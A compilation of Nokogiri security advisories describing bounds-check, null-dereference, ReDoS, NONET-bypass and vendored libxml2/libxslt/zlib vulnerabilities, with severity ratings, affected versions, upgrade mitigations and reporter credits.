Nokogiri::XML::NodeSet#[] (and its alias #slice) checked the requested index against the node set's bounds using a 32-bit-truncated copy of the index. A large negative index could pass the check and then be used at full width, reading outside the node set's storage. On CRuby this is an out-of-bounds read that typically crashes the process; on JRuby it is not memory-unsafe but returns an incorrect node.

Nokogiri 1.19.4 performs the bounds check against the full-width index.

Severity

The Nokogiri maintainers have evaluated this as medium severity.

Exploitation requires an application to pass an attacker-controlled integer to NodeSet#[]. The primary impact is a controlled crash (denial of service), with potential for memory disclosure on CRuby.

On JRuby, Nokogiri is not affected by this vulnerability.

Mitigation

Upgrade to Nokogiri 1.19.4 or later.

As a workaround, applications that index a NodeSet with externally-supplied integers can validate the index against node_set.length before use, or avoid passing untrusted values as an index.

Credit

This issue was responsibly reported by Zheng Yu from depthfirst.com.

🚨 Nokogiri: Null Pointer Dereference calling methods on uninitialized wrapper classes

Summary

Nokogiri contains a bug when calling certain methods on allocated-but-uninitialized native wrapper classes that inherit from Nokogiri::XML::Node. This caused a NULL pointer dereference that could crash the process.

Nokogiri 1.19.4 checks for missing native data pointers and raises a RuntimeError.

JRuby is not affected.

Severity

The Nokogiri maintainers have evaluated this as low severity. This is only triggered by a programming error. It requires application code to call .allocate directly on a native-backed class and then invoke methods on the resulting uninitialized object. It cannot be triggered by untrusted input or through normal use of the public API.

Mitigation

Upgrade to Nokogiri 1.19.4 or later.

Avoid calling .allocate directly on Nokogiri native-backed classes. Use the documented constructors and factory methods instead.

Credit

This issue was responsibly reported by Zheng Yu from depthfirst.com.

🚨 Nokogiri: XML::Schema on JRuby allows network requests when NONET is set, bypassing CVE-2020-26247

Summary

The NONET parse option, which Nokogiri turns on by default for Nokogiri::XML::Schema (see CVE-2020-26247), was not correctly enforced on the JRuby implementation. As a result, a schema parsed with default options could still cause external resources to be fetched over the network, potentially enabling SSRF or XXE attacks.

Nokogiri 1.19.4 replaces the scheme denylist with an allowlist. When NONET is enabled, only local resources (a file: scheme, or a relative or absolute path with no scheme) are resolved, and every network scheme is blocked, case-insensitively. This brings the JRuby behavior in line with CRuby.

Only the JRuby implementation is affected. CRuby is not affected, because libxml2's xmlNoNetExternalEntityLoader blocks all network schemes at the I/O layer regardless of scheme or case.

Severity

The Nokogiri maintainers have evaluated this as low severity (CVSS 2.6, CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N). It is a bypass of CVE-2020-26247, which was scored the same way.

Mitigation

Upgrade to Nokogiri 1.19.4 or later.

There are no known workarounds for affected versions.

This change properly enforces NONET on JRuby, which is a breaking change for any code that (perhaps unknowingly) relied on the previous behavior to load network resources with default parse options. If you trust your input and want to allow external resources to be accessed over the network, you can explicitly disable NONET, exactly as documented for CVE-2020-26247:

Ensure the input is trusted. Do not enable this option for untrusted input.

Pass a Nokogiri::XML::ParseOptions with the NONET flag turned off:
# allows resources to be accessed over the network for trusted input
schema = Nokogiri::XML::Schema.new(trusted_schema, Nokogiri::XML::ParseOptions.new.nononet)
References

Bypass of: GHSA-vr8q-g5c7-m54m

Credit

This issue was responsibly reported by @bilerden.

🚨 Nokogiri XSLT transform has a memory leak

Summary

Nokogiri's Nokogiri::XSLT::Stylesheet#transform leaks a small heap allocation when passed a Ruby string parameter containing a null byte.

For applications that pass attacker-controlled input through XSLT.transform parameters, this may be a vector for a denial of service attack against long-running processes.

Mitigation

Upgrade to Nokogiri >= 1.19.3.

Users may also be able to mitigate this issue without upgrading by validating untrusted transform parameters before passing them to Nokogiri::XSLT::Stylesheet#transform.

Severity

The Nokogiri maintainers have evaluated this as Moderate Severity, CVSS 5.3.

Each leaked allocation is approximately 24–32 bytes, so meaningful memory growth requires sustained attacker-controlled traffic at high call rates. The bug does not cause memory corruption, information disclosure, or any change in the behavior of the transform itself, and the string-handling exception is raised as expected.

Applications that do not pass raw attacker-controlled bytes to XSLT parameters are unlikely to be affected in practice.

Resources

CWE-401: Missing Release of Memory after Effective Lifetime

Credit

This vulnerability was responsibly reported by @Captainjack-kor.

🚨 Nokogiri CSS selector tokenizer has regular expression backtracking

Summary

Nokogiri's CSS selector tokenizer contains regular expressions whose construction may result in exponential regex backtracking on adversarial selectors. Three ReDoS vectors are addressed in this release:

String-literal tokenization on certain unterminated quoted-string input.

String-literal tokenization on a separate class of hex-escape-rich input.

Identifier tokenization on hex-escape-rich input.

The public CSS selector methods that funnel through the affected tokenizer are Nokogiri::CSS.xpath_for, Node#css, Node#at_css, Searchable#search, and CSS::Parser#parse.

Mitigation

Upgrade to Nokogiri >= 1.19.3.

If users are unable to upgrade, two options are available:

Avoid the use of attacker-controlled text in CSS selectors. Applications that only pass developer-authored selectors to Nokogiri are not directly exposed.

Set global Regexp.timeout (Ruby 3.2+, JRuby 9.4+) to bound parse time.

Severity

The Nokogiri maintainers have evaluated this as High Severity (CVSS 7.5, AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

An attacker able to inject user-supplied text into a CSS selector parse method can cause exponential backtracking, resulting in a potential denial of service.

Resources

CWE-1333: Inefficient Regular Expression Complexity

Credit

Vector 1 was responsibly reported by @colby-swandale. Vectors 2 and 3 were discovered by @flavorjones during the response to the original report.

🚨 Nokogiri does not check the return value from xmlC14NExecute

Summary

Nokogiri's CRuby extension fails to check the return value from xmlC14NExecute in the method Nokogiri::XML::Document#canonicalize and Nokogiri::XML::Node#canonicalize. When canonicalization fails, an empty string is returned instead of raising an exception. This incorrect return value may allow downstream libraries to accept invalid or incomplete canonicalized XML, which has been demonstrated to enable signature validation bypass in SAML libraries.

JRuby is not affected, as the Java implementation correctly raises RuntimeError on canonicalization failure.

Mitigation

Upgrade to Nokogiri >= 1.19.1.

Severity

The maintainers have assessed this as Medium severity. Nokogiri itself is a parsing library without a clear security boundary related to canonicalization, so the direct impact is that a method returns incorrect data on invalid input. However, this behavior was exploited in practice to bypass SAML signature validation in downstream libraries (see References).

Credit

This vulnerability was responsibly reported by HackerOne researcher d4d.

🚨 Nokogiri patches vendored libxml2 to resolve multiple CVEs

Summary

Nokogiri v1.18.9 patches the vendored libxml2 to address CVE-2025-6021, CVE-2025-6170, CVE-2025-49794, CVE-2025-49795, and CVE-2025-49796.

Impact and severity

CVE-2025-6021

A flaw was found in libxml2's xmlBuildQName function, where integer overflows in buffer size calculations can lead to a stack-based buffer overflow. This issue can result in memory corruption or a denial of service when processing crafted input.

NVD claims a severity of 7.5 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/17d950ae

CVE-2025-6170

A flaw was found in the interactive shell of the xmllint command-line tool, used for parsing XML files. When a user inputs an overly long command, the program does not check the input size properly, which can cause it to crash. This issue might allow attackers to run harmful code in rare configurations without modern protections.

NVD claims a severity of 2.5 Low (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L)

Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/5e9ec5c1

CVE-2025-49794

A use-after-free vulnerability was found in libxml2. This issue occurs when parsing XPath elements under certain circumstances when the XML schematron has the <sch:name path="..."/> schema elements. This flaw allows a malicious actor to craft a malicious XML document used as input for libxml, resulting in the program's crash using libxml or other possible undefined behaviors.

NVD claims a severity of 9.1 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)

Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/81cef8c5

CVE-2025-49795

A NULL pointer dereference vulnerability was found in libxml2 when processing XPath XML expressions. This flaw allows an attacker to craft a malicious XML input to libxml2, leading to a denial of service.

NVD claims a severity of 7.5 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/62048278

CVE-2025-49796

A vulnerability was found in libxml2. Processing certain sch:name elements from the input XML file can trigger a memory corruption issue. This flaw allows an attacker to craft a malicious XML input file that can lead libxml to crash, resulting in a denial of service or other possible undefined behavior due to sensitive data being corrupted in memory.

NVD claims a severity of 9.1 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)

Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/81cef8c5

Affected Versions

Nokogiri < 1.18.9 when using CRuby (MRI) with vendored libxml2

Patched Versions

Nokogiri >= 1.18.9

Mitigation

Upgrade to Nokogiri v1.18.9 or later.

Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link Nokogiri against patched external libxml2 libraries which will also address these same issues.

References

#3526

https://nvd.nist.gov/vuln/detail/CVE-2025-6021

https://nvd.nist.gov/vuln/detail/CVE-2025-6170

https://nvd.nist.gov/vuln/detail/CVE-2025-49794

https://nvd.nist.gov/vuln/detail/CVE-2025-49795

https://nvd.nist.gov/vuln/detail/CVE-2025-49796

🚨 Nokogiri updates packaged libxml2 to v2.13.8 to resolve CVE-2025-32414 and CVE-2025-32415

Summary

Nokogiri v1.18.8 upgrades its dependency libxml2 to v2.13.8.

libxml2 v2.13.8 addresses:

CVE-2025-32414

described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/889

CVE-2025-32415

described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/890

Impact

CVE-2025-32414: No impact

In libxml2 before 2.13.8 and 2.14.x before 2.14.2, out-of-bounds memory access can occur in the Python API (Python bindings) because of an incorrect return value. This occurs in xmlPythonFileRead and xmlPythonFileReadRaw because of a difference between bytes and characters.

There is no impact from this CVE for Nokogiri users.

CVE-2025-32415: Low impact

In libxml2 before 2.13.8 and 2.14.x before 2.14.2, xmlSchemaIDCFillNodeTables in xmlschemas.c has a heap-based buffer under-read. To exploit this, a crafted XML document must be validated against an XML schema with certain identity constraints, or a crafted XML schema must be used.

In the upstream issue, further context is provided by the maintainer:

The bug affects validation against untrusted XML Schemas (.xsd) and validation of untrusted
documents against trusted Schemas if they make use of xsd:keyref in combination with recursively
defined types that have additional identity constraints.

MITRE has published a severity score of 2.9 LOW (CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) for this CVE.

🚨 Nokogiri updates packaged libxslt to v1.1.43 to resolve multiple CVEs

Summary

Nokogiri v1.18.4 upgrades its dependency libxslt to v1.1.43.

libxslt v1.1.43 resolves:

CVE-2025-24855: Fix use-after-free of XPath context node

CVE-2024-55549: Fix UAF related to excluded namespaces

Impact

CVE-2025-24855

"Use-after-free due to xsltEvalXPathStringNs leaking xpathCtxt->node"

MITRE has rated this 7.8 High CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H

Upstream report: https://gitlab.gnome.org/GNOME/libxslt/-/issues/128

NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-24855

CVE-2024-55549

"Use-after-free related to excluded result prefixes"

MITRE has rated this 7.8 High CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H

Upstream report: https://gitlab.gnome.org/GNOME/libxslt/-/issues/127

NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-55549

🚨 Nokogiri updates packaged libxml2 to 2.13.6 to resolve CVE-2025-24928 and CVE-2024-56171

Summary

Nokogiri v1.18.3 upgrades its dependency libxml2 to v2.13.6.

libxml2 v2.13.6 addresses:

CVE-2025-24928

described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/847

CVE-2024-56171

described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/828

Impact

CVE-2025-24928

Stack-buffer overflow is possible when reporting DTD validation errors if the input contains a long (~3kb) QName prefix.

CVE-2024-56171

Use-after-free is possible during validation against untrusted XML Schemas (.xsd) and, potentially, validation of untrusted documents against trusted Schemas if they make use of xsd:keyref in combination with recursively defined types that have additional identity constraints.

🚨 Nokogiri updates packaged libxml2 to v2.12.7 to resolve CVE-2024-34459

Summary

Nokogiri v1.16.5 upgrades its dependency libxml2 to 2.12.7 from 2.12.6.

libxml2 v2.12.7 addresses CVE-2024-34459:

described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/720

patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/2876ac53

Impact

There is no impact to Nokogiri users because the issue is present only in libxml2's xmllint tool which Nokogiri does not provide or expose.

Timeline

2024-05-13 05:57 EDT, libxml2 2.12.7 release is announced

2024-05-13 08:30 EDT, nokogiri maintainers begin triage

2024-05-13 10:05 EDT, nokogiri v1.16.5 is released and this GHSA made public

🚨 Nokogiri update packaged libxml2 to v2.12.5 to resolve CVE-2024-25062

Summary

Nokogiri upgrades its dependency libxml2 as follows:

Nokogiri v1.15.6 upgrades libxml2 to 2.11.7 from 2.11.6

Nokogiri v1.16.2 upgrades libxml2 to 2.12.5 from 2.12.4

libxml2 v2.11.7 and v2.12.5 address the following vulnerability:

CVE-2024-25062 / https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25062

described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/604

patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970

Please note that this advisory only applies to the CRuby implementation of Nokogiri, and only if the packaged libraries are being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's libxml2 release announcements.

JRuby users are not affected.

Mitigation

Upgrade to Nokogiri ~> 1.15.6 or >= 1.16.2.

Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile
and link Nokogiri against patched external libxml2 libraries which will also address these same
issues.

Impact

From the CVE description, this issue applies to the xmlTextReader module (which underlies Nokogiri::XML::Reader):

When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.

Timeline

2024-02-04 10:35 EST - this GHSA is drafted without complete details about when the upstream issue was introduced; a request is made of libxml2 maintainers for more detailed information

2024-02-04 10:48 EST - updated GHSA to reflect libxml2 maintainers' confirmation of affected versions

2024-02-04 11:54 EST - v1.16.2 published, this GHSA made public

2024-02-05 10:18 EST - updated with MITRE link to the CVE information, and updated "Impact" section

2024-03-16 09:03 EDT - v1.15.6 published (see discussion at #3146), updated mitigation information

2024-03-18 22:12 EDT - update "affected products" range with v1.15.6 information

🚨 Nokogiri update packaged libxml2 to v2.12.5 to resolve CVE-2024-25062

Summary

Nokogiri upgrades its dependency libxml2 as follows:

Nokogiri v1.15.6 upgrades libxml2 to 2.11.7 from 2.11.6

Nokogiri v1.16.2 upgrades libxml2 to 2.12.5 from 2.12.4

libxml2 v2.11.7 and v2.12.5 address the following vulnerability:

CVE-2024-25062 / https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25062

described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/604

patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970

Please note that this advisory only applies to the CRuby implementation of Nokogiri, and only if the packaged libraries are being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's libxml2 release announcements.

JRuby users are not affected.

Mitigation

Upgrade to Nokogiri ~> 1.15.6 or >= 1.16.2.

Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile
and link Nokogiri against patched external libxml2 libraries which will also address these same
issues.

Impact

From the CVE description, this issue applies to the xmlTextReader module (which underlies Nokogiri::XML::Reader):

When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.

Timeline

2024-02-04 10:35 EST - this GHSA is drafted without complete details about when the upstream issue was introduced; a request is made of libxml2 maintainers for more detailed information

2024-02-04 10:48 EST - updated GHSA to reflect libxml2 maintainers' confirmation of affected versions

2024-02-04 11:54 EST - v1.16.2 published, this GHSA made public

2024-02-05 10:18 EST - updated with MITRE link to the CVE information, and updated "Impact" section

2024-03-16 09:03 EDT - v1.15.6 published (see discussion at #3146), updated mitigation information

2024-03-18 22:12 EDT - update "affected products" range with v1.15.6 information

🚨 Nokogiri updates packaged libxml2 to v2.10.4 to resolve multiple CVEs

Summary

Nokogiri v1.14.3 upgrades the packaged version of its dependency libxml2 to v2.10.4 from v2.10.3.

libxml2 v2.10.4 addresses the following known vulnerabilities:

CVE-2023-29469: Hashing of empty dict strings isn't deterministic

CVE-2023-28484: Fix null deref in xmlSchemaFixupComplexType

Schemas: Fix null-pointer-deref in xmlSchemaCheckCOSSTDerivedOK

Please note that this advisory only applies to the CRuby implementation of Nokogiri < 1.14.3, and only if the packaged libraries are being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's libxml2 release announcements.

Mitigation

Upgrade to Nokogiri >= 1.14.3.

Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link Nokogiri against external libraries libxml2 >= 2.10.4 which will also address these same issues.

Impact

No public information has yet been published about the security-related issues other than the upstream commits. Examination of those changesets indicate that the more serious issues relate to libxml2 dereferencing NULL pointers and potentially segfaulting while parsing untrusted inputs.

The commits can be examined at:

[CVE-2023-29469] Hashing of empty dict strings isn't deterministic (09a2dd45) · Commits · GNOME / libxml2 · GitLab

[CVE-2023-28484] Fix null deref in xmlSchemaFixupComplexType (647e072e) · Commits · GNOME / libxml2 · GitLab

schemas: Fix null-pointer-deref in xmlSchemaCheckCOSSTDerivedOK (4c6922f7) · Commits · GNOME / libxml2 · GitLab

🚨 Unchecked return value from xmlTextReaderExpand

Summary

Nokogiri 1.13.8, 1.13.9 fails to check the return value from xmlTextReaderExpand in the method Nokogiri::XML::Reader#attribute_hash. This can lead to a null pointer exception when invalid markup is being parsed.

For applications using XML::Reader to parse untrusted inputs, this may potentially be a vector for a denial of service attack.

Mitigation

Upgrade to Nokogiri >= 1.13.10.

Users may be able to search their code for calls to either XML::Reader#attributes or XML::Reader#attribute_hash to determine if they are affected.

Severity

The Nokogiri maintainers have evaluated this as High Severity 7.5 (CVSS3.1).

References

CWE - CWE-252: Unchecked Return Value (4.9)

CWE - CWE-476: NULL Pointer Dereference (4.9)

Credit

This vulnerability was responsibly reported by @davidwilemski.

🚨 Update bundled libxml2 to v2.10.3 to resolve multiple CVEs

Summary

Nokogiri v1.13.9 upgrades the packaged version of its dependency libxml2 to v2.10.3 from v2.9.14.

libxml2 v2.10.3 addresses the following known vulnerabilities:

CVE-2022-2309

CVE-2022-40304

CVE-2022-40303

Please note that this advisory only applies to the CRuby implementation of Nokogiri < 1.13.9, and only if the packaged libraries are being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's libxml2 release announcements.

Mitigation

Upgrade to Nokogiri >= 1.13.9.

Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link Nokogiri against external libraries libxml2 >= 2.10.3 which will also address these same issues.

Impact

libxml2 CVE-2022-2309

CVSS3 score: Under evaluation

Type: Denial of service

Description: NULL Pointer Dereference allows attackers to cause a denial of service (or application crash). This only applies when lxml is used together with libxml2 2.9.10 through 2.9.14. libxml2 2.9.9 and earlier are not affected. It allows triggering crashes through forged input data, given a vulnerable code sequence in the application. The vulnerability is caused by the iterwalk function (also used by the canonicalize function). Such code shouldn't be in wide-spread use, given that parsing + iterwalk would usually be replaced with the more efficient iterparse function. However, an XML converter that serialises to C14N would also be vulnerable, for example, and there are legitimate use cases for this code sequence. If untrusted input is received (also remotely) and processed via iterwalk function, a crash can be triggered.

Nokogiri maintainers investigated at #2620 and determined this CVE does not affect Nokogiri users.

libxml2 CVE-2022-40304

CVSS3 score: Unspecified upstream

Type: Data corruption, denial of service

Description: When an entity reference cycle is detected, the entity content is cleared by setting its first byte to zero. But the entity content might be allocated from a dict. In this case, the dict entry becomes corrupted leading to all kinds of logic errors, including memory errors like double-frees.

See https://gitlab.gnome.org/GNOME/libxml2/-/commit/644a89e080bced793295f61f18aac8cfad6bece2

libxml2 CVE-2022-40303

CVSS3 score: Unspecified upstream

Type: Integer overflow

Description: Integer overflows with XML_PARSE_HUGE

See https://gitlab.gnome.org/GNOME/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0

References

libxml2 release notes

CVE-2022-2309

CVE-2022-40304

CVE-2022-40303

🚨 libxslt Type Confusion vulnerability that affects Nokogiri

In numbers.c in libxslt 1.1.33, a type holding grouping characters of an xsl:number instruction was too narrow and an invalid character/length combination could be passed to xsltNumberFormatDecimal, leading to a read of uninitialized stack data.

Nokogiri prior to version 1.10.5 used a vulnerable version of libxslt. Nokogiri 1.10.5 updated libxslt to version 1.1.34 to address this and other vulnerabilities in libxslt.

🚨 Nokogiri has vulnerable dependencies on libxml2 and libxslt

Use after free in Blink XSLT in Google Chrome prior to 91.0.4472.164 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

🚨 Nokogiri contains libxml Out-of-bounds Write vulnerability

There is a flaw in the xml entity encoding functionality of libxml2 in versions before 2.9.11. An attacker who is able to supply a crafted file to be processed by an application linked with the affected functionality of libxml2 could trigger an out-of-bounds read. The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.

Nokogiri prior to version 1.11.4 used a vulnerable version of libxml2. Nokogiri 1.11.4 updated libxml2 to version 2.9.11 to address this and other vulnerabilities in libxml2.

🚨 Nokogiri Implements libxml2 version vulnerable to use-after-free

There's a flaw in libxml2 in versions before 2.9.11. An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.

🚨 Nokogiri Implements libxml2 version vulnerable to null pointer dereferencing

A vulnerability found in libxml2 in versions before 2.9.11 shows that it did not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. The highest threat from this vulnerability is to system availability.

🚨 Nokogiri implementation of libxslt vulnerable to heap corruption

Type confusion in xsltNumberFormatGetMultipleLevel prior to libxslt 1.1.33 could allow attackers to potentially exploit heap corruption via crafted XML data.

Nokogiri prior to version 1.10.5 contains a vulnerable version of libxslt. Nokogiri version 1.10.5 upgrades the dependency to libxslt 1.1.34, which contains a patch for this issue.

🚨 Nokogiri affected by libxslt Use of Uninitialized Resource/Use After Free vulnerability

In xsltCopyText in transform.c in libxslt 1.1.33, a pointer variable isn't reset under certain circumstances. If the relevant memory area happened to be freed and reused in a certain way, a bounds check could fail and memory outside a buffer could be written to, or uninitialized data could be disclosed.

Nokogiri prior to version 1.10.5 contains a vulnerable version of libxslt. Nokogiri version 1.10.5 upgrades the dependency to libxslt 1.1.34, which contains a patch for this issue.

🚨 Uninitialized read in Nokogiri gem

In numbers.c in libxslt 1.1.33, an xsl:number with certain format strings could lead to a uninitialized read in xsltNumberFormatInsertNumbers. This could allow an attacker to discern whether a byte on the stack contains the characters A, a, I, i, or 0, or any other character.

🚨 Nokogiri Improperly Handles Unexpected Data Type

Summary

Nokogiri < v1.13.6 does not type-check all inputs into the XML and HTML4 SAX parsers. For CRuby users, this may allow specially crafted untrusted inputs to cause illegal memory access errors (segfault) or reads from unrelated memory.

Severity

The Nokogiri maintainers have evaluated this as High 8.2 (CVSS3.1).

Mitigation

CRuby users should upgrade to Nokogiri >= 1.13.6.

JRuby users are not affected.

Workarounds

To avoid this vulnerability in affected applications, ensure the untrusted input is a String by calling #to_s or equivalent.

Credit

This vulnerability was responsibly reported by @agustingianni and the Github Security Lab.

🚨 Integer Overflow or Wraparound in libxml2 affects Nokogiri

Summary

Nokogiri v1.13.5 upgrades the packaged version of its dependency libxml2 from v2.9.13 to v2.9.14.

libxml2 v2.9.14 addresses CVE-2022-29824. This version also includes several security-related bug fixes for which CVEs were not created, including a potential double-free, potential memory leaks, and integer-overflow.

Please note that this advisory only applies to the CRuby implementation of Nokogiri < 1.13.5, and only if the packaged libraries are being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's libxml2 and libxslt release announcements.

Mitigation

Upgrade to Nokogiri >= 1.13.5.

Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link Nokogiri against external libraries libxml2 >= 2.9.14 which will also address these same issues.

Impact

libxml2 CVE-2022-29824

CVSS3 score:

Unspecified upstream

Nokogiri maintainers evaluate at 8.6 (High) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H). Note that this is different from the CVSS assessed by NVD.

Type: Denial of service, information disclosure

Description: In libxml2 before 2.9.14, several buffer handling functions in buf.c (xmlBuf*) and tree.c (xmlBuffer*) don't check for integer overflows. This can result in out-of-bounds memory writes. Exploitation requires a victim to open a crafted, multi-gigabyte XML file. Other software using libxml2's buffer functions, for example libxslt through 1.1.35, is affected as well.

Fixed: https://gitlab.gnome.org/GNOME/libxml2/-/commit/2554a24

All versions of libml2 prior to v2.9.14 are affected.

Applications parsing or serializing multi-gigabyte documents (in excess of INT_MAX bytes) may be vulnerable to an integer overflow bug in buffer handling that could lead to exposure of confidential data, modification of unrelated data, or a segmentation fault resulting in a denial-of-service.

References

libxml2 v2.9.14 release notes

CVE-2022-29824

CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer

🚨 Denial of Service (DoS) in Nokogiri on JRuby

Summary

Nokogiri v1.13.4 updates the vendored org.cyberneko.html library to 1.9.22.noko2 which addresses CVE-2022-24839. That CVE is rated 7.5 (High Severity).

See GHSA-9849-p7jc-9rmv for more information.

Please note that this advisory only applies to the JRuby implementation of Nokogiri < 1.13.4.

Mitigation

Upgrade to Nokogiri >= 1.13.4.

Impact

CVE-2022-24839 in nekohtml

Severity: High 7.5

Type: CWE-400 Uncontrolled Resource Consumption

Description: The fork of org.cyberneko.html used by Nokogiri (Rubygem) raises a java.lang.OutOfMemoryError exception when parsing ill-formed HTML markup.

See also: GHSA-9849-p7jc-9rmv

🚨 Nokogiri Inefficient Regular Expression Complexity

Summary

Nokogiri < v1.13.4 contains an inefficient regular expression that is susceptible to excessive backtracking when attempting to detect encoding in HTML documents.

Mitigation

Upgrade to Nokogiri >= 1.13.4.

Severity

The Nokogiri maintainers have evaluated this as High Severity 7.5 (CVSS3.1).

References

CWE-1333 Inefficient Regular Expression Complexity

Credit

This vulnerability was reported by HackerOne user ooooooo_q (ななおく).

🚨 XML Injection in Xerces Java affects Nokogiri

Summary

Nokogiri v1.13.4 updates the vendored xerces:xercesImpl from 2.12.0 to 2.12.2, which addresses CVE-2022-23437. That CVE is scored as CVSS 6.5 "Medium" on the NVD record.

Please note that this advisory only applies to the JRuby implementation of Nokogiri < 1.13.4.

Mitigation

Upgrade to Nokogiri >= v1.13.4.

Impact

CVE-2022-23437 in xerces-J

Severity: Medium

Type: CWE-91 XML Injection (aka Blind XPath Injection)

Description: There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions.

See also: GHSA-h65f-jvqw-m9fj

🚨 Out-of-bounds Write in zlib affects Nokogiri

Summary

Nokogiri v1.13.4 updates the vendored zlib from 1.2.11 to 1.2.12, which addresses CVE-2018-25032. That CVE is scored as CVSS 7.4 "High" on the NVD record as of 2022-04-05.

Please note that this advisory only applies to the CRuby implementation of Nokogiri < 1.13.4, and only if the packaged version of zlib is being used. Please see this document for a complete description of which platform gems vendor zlib. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's zlib release announcements.

Mitigation

Upgrade to Nokogiri >= v1.13.4.

Impact

CVE-2018-25032 in zlib

Severity: High

Type: CWE-787 Out of bounds write

Description: zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.

🚨 Nokogiri affected by zlib's Out-of-bounds Write vulnerability

zlib 1.2.11 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.

🚨 Vulnerable dependencies in Nokogiri

Summary

Nokogiri v1.13.2 upgrades two of its packaged dependencies:

vendored libxml2 from v2.9.12 to v2.9.13

vendored libxslt from v1.1.34 to v1.1.35

Those library versions address the following upstream CVEs:

libxslt: CVE-2021-30560 (CVSS 8.8, High severity)

libxml2: CVE-2022-23308 (Unspecified severity, see more information below)

Those library versions also address numerous other issues including performance improvements, regression fixes, and bug fixes, as well as memory leaks and other use-after-free issues that were not assigned CVEs.

Please note that this advisory only applies to the CRuby implementation of Nokogiri < 1.13.2, and only if the packaged libraries are being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's libxml2 and libxslt release announcements.

Mitigation

Upgrade to Nokogiri >= 1.13.2.

Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link an older version Nokogiri against external libraries libxml2 >= 2.9.13 and libxslt >= 1.1.35, which will also address these same CVEs.

Impact

libxslt CVE-2021-30560

CVSS3 score: 8.8 (High)

Fixed by https://gitlab.gnome.org/GNOME/libxslt/-/commit/50f9c9c

All versions of libxslt prior to v1.1.35 are affected.

Applications using untrusted XSL stylesheets to transform XML are vulnerable to a denial-of-service attack and should be upgraded immediately.

libxml2 CVE-2022-23308

As of the time this security advisory was published, there is no officially published information available about this CVE's severity. The above NIST link does not yet have a published record, and the libxml2 maintainer has declined to provide a severity score.

Fixed by https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12

Further explanation is at https://mail.gnome.org/archives/xml/2022-February/msg00015.html

The upstream commit and the explanation linked above indicate that an application may be vulnerable to a denial of service, memory disclosure, or code execution if it parses an untrusted document with parse options DTDVALID set to true, and NOENT set to false.

An analysis of these parse options:

While NOENT is off by default for Document, DocumentFragment, Reader, and Schema parsing, it is on by default for XSLT (stylesheet) parsing in Nokogiri v1.12.0 and later.

DTDVALID is an option that Nokogiri does not set for any operations, and so this CVE applies only to applications setting this option explicitly.

It seems reasonable to assume that any application explicitly setting the parse option DTDVALID when parsing untrusted documents is vulnerable and should be upgraded immediately.

